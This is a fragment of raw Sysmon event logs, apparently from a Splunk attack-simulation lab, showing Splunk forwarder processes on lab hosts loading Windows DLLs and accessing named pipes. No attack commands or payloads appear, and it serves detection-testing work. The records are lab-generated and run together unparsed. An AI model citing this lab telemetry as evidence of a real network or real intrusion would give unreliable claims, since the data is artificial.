Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219774Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.081{AD5E2759-5B83-618E-14CE-08000000F101}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000057346249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.361{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\respondent-20211011185456-44547MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63Bfalsetrue 11241100x800000000000000057346248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.359{8B6011A9-887F-6164-4300-00000000F101}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\respondent-20211011185456-445472021-11-12 12:18:11.359 11241100x800000000000000057346247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.358{8B6011A9-887D-6164-2C00-00000000F101}2924C:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\surveyor-20211011185454-445482021-11-12 12:18:11.358 534500x800000000000000057346246Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.195{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 10341000x800000000000000057346245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.195{8B6011A9-5B83-618E-4BF3-04000000F101}91845512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.195{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057346243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.195{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057346242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.071{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.071{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CCAC84F9D0778B0C4741763D55854FC,SHA256=0DFA81EA9EDAEC8C0A200AAB09B20501A512ECC7E12BCB050D53F2DEED0CC86Dfalsetrue 734700x800000000000000057346240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.056{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057346239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.056{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057346238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.056{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057346237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.056{8B6011A9-5B83-618E-4BF3-04000000F101}9184\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057346236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.056{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057346235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057346234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057346233Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057346232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057346231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057346230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057346229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057346228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057346227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057346226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057346225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057346224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.040{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057346223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057346222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057346221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057346220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057346219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057346218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057346217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057346216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057346215Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057346214Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057346213Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057346212Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057346211Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057346210Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346209Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057346208Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057346207Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057346206Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057346205Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057346204Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057346203Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057346202Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346201Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.024{8B6011A9-5B83-618E-4BF3-04000000F101}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346200Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 